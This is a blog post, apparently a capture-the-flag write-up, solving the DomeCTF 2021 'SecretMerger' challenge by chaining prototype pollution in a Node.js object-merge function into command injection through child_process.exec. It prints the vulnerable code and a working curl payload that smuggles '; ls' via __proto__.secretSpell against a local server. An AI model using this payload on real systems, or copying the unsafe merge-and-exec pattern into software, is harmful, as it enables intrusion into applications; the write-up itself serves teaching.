<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="index, follow"><title>Prototype Pollution to Command Injection • Asjid Kalam</title><meta name="description" content="Prototype Pollution to Command Injection - Asjid Kalam"><link rel="icon" href="/favicon.svg"><link rel="stylesheet" href="/css/nanoreset.min.css"><link rel="stylesheet" href="/css/theme.css"><link rel="search" type="application/opensearchdescription+xml" href="/atom.xml" title="Asjid Kalam"><meta name="theme-color" content="#222831"><meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="Asjid Kalam" type="application/atom+xml">
</head><body><div class="wrap" id="barba-wrapper"><header><h1 class="branding"><a href="/" title="Asjid Kalam">Asjid Kalam</a></h1><ul class="nav nav-list"><li class="nav-list-item"><a class="nav-list-link no-barba" href="/" target="_self">HOME</a></li><li class="nav-list-item"><a class="nav-list-link no-barba" href="/about" target="_self">ABOUT</a></li><li class="nav-list-item"><a class="nav-list-link no-barba" href="/archives" target="_self">ARCHIVES</a></li><li class="nav-list-item"><a class="nav-list-link no-barba" href="https://github.com/Asjidkalam" target="_blank">GITHUB</a></li></ul></header><div class="barba-container"><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">Prototype Pollution to Command Injection</h1><div class="post-info"><a></a>Saturday, March 13th 2021</div><div class="post-content"><p><strong>SecretMerger</strong> is a medium difficulty <em>web challenge</em> created for DomeCTF 2021, and in this blog we’ll be discussing how to solve the challenge(the intended way).</p>
<p><img src="/2021/03/13/Prototype-Pollution-to-Command-Injection/chall_files.png" alt="chall-files"></p>
<p>We’re given a node project with 3 files:</p>
<p>├── <code>app.js</code> -&gt; Contains the main application logic<br>├── <code>package.json</code> -&gt; Package information and dependencies used<br>└── <code>utils.js</code>   -&gt; ObjectMerger logic</p>
<p>We can first inspect the <code>app.js</code> to understand what happens server-side.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// app.js</span></span><br><span class="line">app.get(<span class="string">'/'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>)</span>&#123;</span><br><span class="line">    res.end(<span class="string">'Welcome to the Secret Merge service!'</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.post(<span class="string">'/secret'</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>)</span>&#123;</span><br><span class="line">    <span class="keyword">var</span> path = req.body.path;</span><br><span class="line">    <span class="keyword">var</span> value = req.body.value;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">typeof</span> path  !== <span class="string">"undefined"</span>)&#123;</span><br><span class="line">        secretMerger(&#123;&#125;, path, value);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>&#123;</span><br><span class="line">        exec(<span class="string">'cat info.txt '</span> + secretSpell, (err, resp)=&gt; &#123;</span><br><span class="line">            res.end(resp);</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;<span class="keyword">catch</span>(e)&#123;</span><br><span class="line">        res.end(<span class="string">'Server Occured an error. Make sure you get the payload right!'</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> server = app.listen(<span class="number">3000</span>, <span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="built_in">console</span>.log(<span class="string">"secret merger started!"</span>);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>


<p>Route to <code>GET /</code> does nothing else other than the welcome message, we’ll have to dig through <code>POST /secret</code> to find out what’s going on. </p>
<p>It takes two <code>req.body</code> values, <code>path</code> &amp; and <code>value</code>, if they’re defined, they’re passed to the <code>secretMerger()</code> function which is defined in <code>utils.js</code>. So we can take a look at how the <code>secretMerger()</code> processes the values.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// utils.js</span></span><br><span class="line"><span class="keyword">for</span> (len = path.length; i &lt; len; ++i) &#123;</span><br><span class="line">     k = path[i];</span><br><span class="line">     isLastElement = i === len - <span class="number">1</span>;</span><br><span class="line">     <span class="keyword">if</span> (settingAValue &amp;&amp; !obj) &#123;</span><br><span class="line">         obj = &#123;&#125;;</span><br><span class="line">     &#125;</span><br><span class="line">     <span class="keyword">if</span> (settingAValue &amp;&amp; isLastElement) &#123;</span><br><span class="line">         obj[k] = value;</span><br><span class="line">         <span class="keyword">return</span> value;</span><br><span class="line">     &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">         <span class="keyword">if</span> (settingAValue) &#123;</span><br><span class="line">             <span class="keyword">if</span> (<span class="string">'object'</span> !== <span class="keyword">typeof</span> obj[k]) &#123;</span><br><span class="line">                 obj[k] = &#123;&#125;;</span><br><span class="line">             &#125;</span><br><span class="line">             obj = obj[k];</span><br><span class="line">         &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">             <span class="keyword">if</span> (obj &amp;&amp; k <span class="keyword">in</span> obj) &#123;</span><br><span class="line">                 obj = obj[k];</span><br><span class="line">             &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                 <span class="keyword">return</span> <span class="literal">undefined</span>;</span><br><span class="line">             &#125;</span><br><span class="line">         &#125;</span><br><span class="line">     &#125;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> obj;</span><br></pre></td></tr></table></figure>


<p>Reading the code, we can see that the function simply merges two objects together(<em>source</em> as an empty object and <em>destination</em> as it’s path and value). Here’s how the merge works:</p>
<p>For each property in source, check if that property is object itself. If it is then go down recursively and try to map child object properties from source to destination. So essentially we merge object hierarchy from source to destination (same as that of <code>$.extent()</code> in <em>jQuery</em> or <code>_.merge()</code> in <em>lodash</em>).  </p>
<p>In JavaScript, when new objects are created, they carry over the properties and methods of the prototype “object”, which contains basic functionalities such as <code>toString</code>, <code>constructor</code>, and <code>hasOwnProperty</code>. Object-based inheritance gives JavaScript flexibility and efficiency, but it also makes it vulnerable to tampering. Attackers can make application-wide changes to all objects by modifying object, hence creating a <strong>prototype pollution</strong> vulnerability. </p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">exec(<span class="string">'cat info.txt '</span> + secretSpell, (err, resp)=&gt; &#123;</span><br><span class="line">    res.end(resp);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>Going back to <code>app.js</code> again, we can see it then attempts to <code>cat info.txt</code> along with a <code>secretSpell</code> variable, which is not in scope. Also it uses <code>child_process.exec()</code> to spawn subprocess, so we could possibly get an arbitrary OS command injection abusing the <code>secretSpell</code> variable. Here’s how the payload works:</p>
<ul>
<li>Create a malicious destination object to pollute <code>path</code>.</li>
<li>Overwrite the <code>secretSpell</code> variable.</li>
<li>Getting arbitrary command injection.</li>
</ul>
<p>We can access <code>secretSpell</code> through <code>__proto__</code> property of the destination object:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl --data <span class="string">'&#123;"path":"__proto__.secretSpell", "value":"; ls"&#125;'</span> -H <span class="string">"Content-Type: application/json"</span> --url http://127.0.0.1:3000/secret -X POST</span><br></pre></td></tr></table></figure>

<p><img src="/2021/03/13/Prototype-Pollution-to-Command-Injection/ls.png" alt="code-executed!"></p>
<p>After code execution, we can find a directory <code>TopSecretData</code> with the flag in it.</p>
<p><img src="/2021/03/13/Prototype-Pollution-to-Command-Injection/flag.png" alt="flag.txt"></p>
<blockquote>
<p>DomeCTF{ea645983443b225edb3046529bf083be}</p>
</blockquote>
</div></article></div></main><footer><div class="paginator"><a class="next" href="/2020/11/15/f-g-h-A-Pathfinding/">next</a></div><div id="disqus_thread"></div><script>var disqus_shortname = 'odinshell';
var disqus_identifier = '2021/03/13/Prototype-Pollution-to-Command-Injection/';
var disqus_title = 'Prototype Pollution to Command Injection';
var disqus_url = 'https://odinshell.github.io/2021/03/13/Prototype-Pollution-to-Command-Injection/';
(function () {
    var dsq = document.createElement('script'); dsq.async = true;
    dsq.src = 'https://' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();</script><script id="dsq-count-scr" src="//odinshell.disqus.com/count.js" async></script><div class="copyright"><br>Made with ❤️ by <a href="https://twitter.com/odinshell" rel="noreferrer" target="_blank">Asjid Kalam</a></div></footer></div></div><script>var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-42903213-1']);
_gaq.push(['_trackPageview']);

(function () {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();</script><script src="https://cdnjs.cloudflare.com/ajax/libs/barba.js/1.0.0/barba.min.js"></script><script>document.addEventListener('DOMContentLoaded', function() {
    Barba.Pjax.start()
})</script></body></html>